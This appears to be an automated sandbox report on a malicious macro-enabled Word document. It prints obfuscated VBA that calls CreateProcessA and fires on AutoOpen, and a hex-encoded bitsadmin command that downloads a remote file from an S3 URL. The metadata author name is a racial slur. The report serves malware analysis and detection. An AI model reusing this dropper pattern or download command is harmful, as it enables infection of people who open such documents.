Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report QW752ifEe6.bin

Overview

General Information

Sample Name:QW752ifEe6.bin (renamed file extension from bin to docm)
Analysis ID:361939
MD5:82b36c510877ca7a59d20415ff939e0e
SHA1:fad4080d60f4ed53c0fcbd0ec3005728cd99a909
SHA256:b8756966cf478aa401a067f14eefb57f34eea127348973350b14b5b53e3eec4f
Tags:maldoc
Infos:

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with hexadecimal encoded strings
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: QW752ifEe6.docmVirustotal: Detection: 23%Perma Link
Source: QW752ifEe6.docmReversingLabs: Detection: 32%
Machine Learning detection for sampleShow sources
Source: QW752ifEe6.docmJoe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{731E7CAD-FA20-48C4-87C4-17800DB89026}.tmpJump to behavior

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare PtrSafe Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectory" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare PtrSafe Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectoryA" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Source: QW752ifEe6.docmOLE, VBA macro line: Private Declare Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
Document contains an embedded VBA with hexadecimal encoded stringsShow sources
Source: QW752ifEe6.docmStream path 'VBA/NewMacros' : found hex strings
Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function bRGVCEDPVTEFX, String 6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035
Source: QW752ifEe6.docmOLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function AutoOpenName: AutoOpen
Source: QW752ifEe6.docmOLE indicator, VBA macros: true
Source: QW752ifEe6.docmOLE indicator has summary info: false
Source: QW752ifEe6.docmOLE indicator application name: unknown
Source: classification engineClassification label: mal64.expl.winDOCM@1/7@0/0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$752ifEe6.docmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD97D.tmpJump to behavior
Source: QW752ifEe6.docmOLE document summary: title field not present or empty
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: QW752ifEe6.docmVirustotal: Detection: 23%
Source: QW752ifEe6.docmReversingLabs: Detection: 32%
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
QW752ifEe6.docm24%VirustotalBrowse
QW752ifEe6.docm33%ReversingLabsScript-Macro.Trojan.Powload
QW752ifEe6.docm100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:361939
Start date:03.03.2021
Start time:11:45:18
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 13m 44s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:QW752ifEe6.bin (renamed file extension from bin to docm)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.winDOCM@1/7@0/0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Max analysis timeout: 720s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C3C4E1E.png
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image data, 968 x 845, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):613151
Entropy (8bit):7.995665289860801
Encrypted:true
SSDEEP:12288:97sLONzMmJUo9b7OKpdBqqW1xfVKihzxAs2Rj4F+VAw:9kONAWUo9bCK1qt0ijYc+VAw
MD5:DBB01680A5AF46AE380439A62FFC53F6
SHA1:5212A4A414EB7024B3478BEB8F3572593BC76BCC
SHA-256:469E48DA69D2E63A4E209B770F886F8F7463B6C25E25642E894B16ADDDF29B98
SHA-512:9DE5F255561F73A8861E3D7367970FCC6C65A715A892D3282F82D82C771218CEA5E908CBA5AACF329206198872420AF3B116F1BBF7DCB59B626A2A888060FF6D
Malicious:false
Reputation:low
Preview: .PNG........IHDR.......M.....K/Wi....pHYs..........+.... .IDATx..g.$......=DjY...Z.M^..=g....>?{f...\....E...l?.ux....j.['*2"...p.... .....:a.+B.7..s}p)............X(.|..(.8P...o.Q~....g..k.../...&....q.h..0.b..a>......!L.<...M0..<E.L. ...<j>.....F.. ..`..L..~..$q...=.e1?..e.Rh._...k..um..UuV.C..^.(V......,..<.@...$....._.!.7!...E......wE..<..m..E?....b..!.......g..-.."....IQ/..>K..#e..............n..?...".,4/S.I.I?....E.X.!>#&y.!.YJ..Lg-.y;.1...ei.....;./..5..E=-..n...B.\WiJ. ....\').^...B.b..=q.*"R.VXa..>,...`..<.....3.....1............0!..l.....P.V...b.]p(.........R..,.Yq.l.... ......Sv.}...rs....|.......3..(./F...)_.\.x<..|....c7./3#...f..=...B.....6..U-.....IJ..PS..&6aBV.u........S.......v#....$........B|8..$..B...5..@....... ............H~wA.J...\.t.... C.....X.....%..k._..ozZm..*w!.i.C....V(..t.s..w..OKWM|..^..ef.\K2_......I.1....qmN!..5.?_. VTJ.m..C.y.3..-.6].....:".vF..VX.]....k.1.P{.C.y....f..]u.[.../C.....r*..c...|.n<\.p.3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{731E7CAD-FA20-48C4-87C4-17800DB89026}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EC948C2F-5218-4A38-A66D-F6FECB16C1E9}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):0.30894419111068266
Encrypted:false
SSDEEP:3:vltlflpY/44XldlN5WllllzNIDtb7ZlhQtChC:vlXYM//SDtb7ZUtP
MD5:3B49E66C8DF5B0357A68E5F0047F1E40
SHA1:2EE0055F794727102F44FFD4274EEEAEF1B3953D
SHA-256:11D8FDBE5786A420852CE73DF76D08E2642F8AABC9F6C7ACD277A74122C4D3FC
SHA-512:21584FC1AB7985EE60A87F3CAF1E8048E338ABD9B3986F617863AC0731F07B02CA6F1624A42F683817D63AC239B2D96FFB513CCE9689E14B96BA65DEDBDF55B6
Malicious:false
Reputation:low
Preview: ../.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\QW752ifEe6.LNK
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 3 18:45:28 2021, mtime=Wed Mar 3 18:45:28 2021, atime=Wed Mar 3 18:45:40 2021, length=630460, window=hide
Category:dropped
Size (bytes):2038
Entropy (8bit):4.556604515631506
Encrypted:false
SSDEEP:48:87Tk/XT0jTDOHNQ/I+Qh27Tk/XT0jTDOHNQ/I+Q/:87Tk/XojTSi/I+Qh27Tk/XojTSi/I+Q/
MD5:3C2B0D8A01FD1B862D5E76900C125B92
SHA1:43D26FEEC3A3BE291CFAD6DF006A383741FC9006
SHA-256:E1A1BEF76FCAAE9D3C17F79F6A8B9B7CE52DA75B9F516CD5E8920A97A64D58BE
SHA-512:C3EC7262BAF46F1F58057DCDC9EA8FF9C09E423EBC03A3EE31F7517BD813750FC38E951723F76357B0380AD29E97E0A79EC5359C06194DDDBB210A29C14E05BB
Malicious:false
Reputation:low
Preview: L..................F.... .....P.e.....P.e...>.8.e................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....cR....Desktop.d......QK.XcR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.....cR.. .QW752I~1.DOC..L......cR..cR..*.........................Q.W.7.5.2.i.f.E.e.6...d.o.c.m.......y...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\QW752ifEe6.docm.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.W.7.5.2.i.f.E.e.6...d.o.c.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9F.C...........[D_....3N...W...9F
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.469965389005501
Encrypted:false
SSDEEP:3:H/BPBFFosJBFFomxW/BPBFFov:H/BPDFJDFMBPDFy
MD5:A494FD1BF2AA035A353F8A30D052B79F
SHA1:D763E35EFA1AB6F2E08AE1BC0122BA7512A6B01F
SHA-256:BAC8304555932DE1C180342E575BA66AC396A82F621A20D4B8BB1DD9B1EDF13D
SHA-512:EA4ADDC637506AE1A47773BC5025C90B72B978F78100B12658B7D6CFC914BD5F120B1B709DFF59AAC5A7EBAAD4060C43CA9D1C9A310DCB2EB522DB4C461A7C24
Malicious:false
Reputation:low
Preview: [misc]..QW752ifEe6.LNK=0..QW752ifEe6.LNK=0..[misc]..QW752ifEe6.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.4311600611816426
Encrypted:false
SSDEEP:3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
MD5:F3E6EBAC97D4DEF04C645869D96DC090
SHA1:F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
SHA-256:67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
SHA-512:B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
Malicious:false
Reputation:moderate, very likely benign file
Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
C:\Users\user\Desktop\~$752ifEe6.docm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.4311600611816426
Encrypted:false
SSDEEP:3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
MD5:F3E6EBAC97D4DEF04C645869D96DC090
SHA1:F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
SHA-256:67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
SHA-512:B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
Malicious:false
Reputation:moderate, very likely benign file
Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General

File type:Microsoft Word 2007+
Entropy (8bit):7.995085153837643
TrID:
  • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
  • Word Microsoft Office Open XML Format document (49504/1) 32.35%
  • Word Microsoft Office Open XML Format document (43504/1) 28.43%
  • ZIP compressed archive (8000/1) 5.23%
File name:QW752ifEe6.docm
File size:633650
MD5:82b36c510877ca7a59d20415ff939e0e
SHA1:fad4080d60f4ed53c0fcbd0ec3005728cd99a909
SHA256:b8756966cf478aa401a067f14eefb57f34eea127348973350b14b5b53e3eec4f
SHA512:0298eb0fe329753a1f28e69d307d6ee86d06ff26059335745f5fbfbca755997d071385c519bae8819195eacf45b9c069826689de27f58b028086b7f3624bd7ed
SSDEEP:12288:S7sLONzMmJUo9b7OKpdBqqW1xfVKihzxAs2Rj4F+VAkT:SkONAWUo9bCK1qt0ijYc+VAkT
File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e6a2a2acbcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "/opt/package/joesandbox/database/analysis/361939/sample/QW752ifEe6.docm"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Author:niggaer
Template:Normal.dotm
Last Saved By:niggaer
Revion Number:176
Total Edit Time:358
Create Time:2021-03-02T00:26:00Z
Last Saved Time:2021-03-02T10:43:00Z
Number of Pages:1
Number of Words:0
Number of Characters:3
Creating Application:Microsoft Office Word
Security:0

Document Summary

Number of Lines:1
Number of Paragraphs:1
Thumbnail Scaling Desired:false
Company:
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:12.0000

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 8268
General
Stream Path:VBA/NewMacros
VBA File Name:NewMacros.bas
Stream Size:8268
Data ASCII:. . . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . [ g s . . . . . . . . . . . . . . 4 . . . . . . . . . 8 . $ . s . . . o . . . . . . . . . C r e a t e P r o c e s s A . . C r e a t e P r o c e s s A . . . . . . G e t C u r r e n t D i r e c t o r y A . . i . . . 8 . x . n . . . y . . . . . . . . . W a i t F o r S i n g l e O b j e c t . G e t C u r r e n t D i r e c t o r y A . . . . . . 8 . . . . . P . . . . . . . . . . . W a i t F o r S i n g l e O b j e c t . . . . . .
Data Raw:01 16 01 00 00 a8 01 00 00 e4 0a 00 00 8c 01 00 00 68 02 00 00 ff ff ff ff ed 0a 00 00 91 17 00 00 00 00 00 00 01 00 00 00 a1 5b 67 73 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 34 00 01 01 b8 00 00 00 00 00 38 02 24 00 73 00 ff ff 6f 00 00 00 00 00 00 00 00 00 43 72 65 61 74 65 50 72 6f 63 65 73 73 41 00 00 43 72 65 61 74 65 50 72 6f 63 65 73 73 41 00 00 04 00 ff ff 47 65 74 43 75

VBA Code Keywords

Keyword
#Else
Const
gzdppyufultz
iFYFVDJZCMF
"WaitForSingleObject"
jGRYIJOIQECNZWKRWBO
Public
oBPCCMYYIVLQA
iZMSNEVO()
bMIJESOVOFPXNIGW
Long)
sBHTGKLDEYWA
jdrmcyqidsrv
Long,
kXEHZUMYUDDUTSHZMQG
xCZSHOMU
hMGQMFZNPUGWHWGDDUJH
structProcessInformation
Explicit
"GetCurrentDirectoryA"
kEDLLFOYANTEMWH
PtrSafe
bNUIATLRVDMAZCVWBE
Declare
vUXRBEFWWFVAP
nHQTKGIQSBRUKJ
vAGEFXNZUIALBSWQZLUC
InStr(tKTSMASYXK,
String,
kXEHZUMYUDDUTSHZMQG,
String)
jdrmcyqidsrv,
aBBMXFDPLCFE
mNWIGENREYIUGMPSNK
bHFOSKLPRUPEXYLBLM
nNLBYBCNSKGBCQMOMY
eWZICHCSUGVFF(mNWIGENREYIUGMPSNK,
&HFFFFFFFF
pJAKUAJMMK
Option
vDFBEKYQKFLIEV
uRRNLDPOUTLCYKOUQNRX)
LongPtr,
eWZICHCSUGVFF
"GetCurrentDirectory"
gADXEXOUMAYJAS
hCCSLJIPWBXJZFSMOBC
zGIDNKNRS
mtfxdlgfwsxa
Boolean,
tKTSMASYXK)
lpProcessInformation
kJPTFUFMQKIIDRNB
ByVal
Mid$(gzdppyufultz,
rPXYQAUNQANDHLJU
qDNZSFLJWGOZU
sBMDCJNRZMFA
cOZQUISIGDQOQWG
lYFQGPKFNCVHQPCIKI(vUXRBEFWWFVAP,
structStartupInfo
vYBNYBMWDIOPXGQLY
(ByVal
uRRNLDPOUTLCYKOUQNRX
AutoOpen()
mtfxdlgfwsxa(ByVal
mDRJCTPAMQBQHAAQTWK
Chr$(Val("&H"
lZHEGTMHAR)
Len(gzdppyufultz)
structProcessInformation)
Integer
uXDIHQSDQDSFURPU
False,
Left(tKTSMASYXK,
nHQTKGIQSBRUKJ(structProcessInformation.nNLBYBCNSKGBCQMOMY,
bRGVCEDPVTEFX
bRGVCEDPVTEFX()
qTQRKIHNKBFF
Attribute
pUOXYKNLRNVUOFQF
aKJTVBSGMCQYROMGH
lYFQGPKFNCVHQPCIKI
tKTSMASYXK
eBOIVUIXGZQX
VB_Name
Space(vUXRBEFWWFVAP)
bOKVRZINWWRNBYT
Function
mNWIGENREYIUGMPSNK,
jPEZPVSRELZDREQJPKQC
iBKFPVIEFUQC
jPEZPVSRELZDREQJPKQC,
lZHEGTMHAR
pLLESESKSWWRPH
structStartupInfo,
vbNullChar)
"NewMacros"
Alias
xQFYQCXKQZVW
String
tAFLNIDKOSMPLAQ
"CreateProcessA"
Private
lpStartupInfo
jVGXVBEGDZYNGKPD
iQDBSREAJJVCDBLKAGX
eXJVYDYJMQX
VBA Code
Attribute VB_Name = "NewMacros"
Option Explicit
#If Win64 Then
Private Declare PtrSafe Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectory" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long
Private Declare PtrSafe Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long
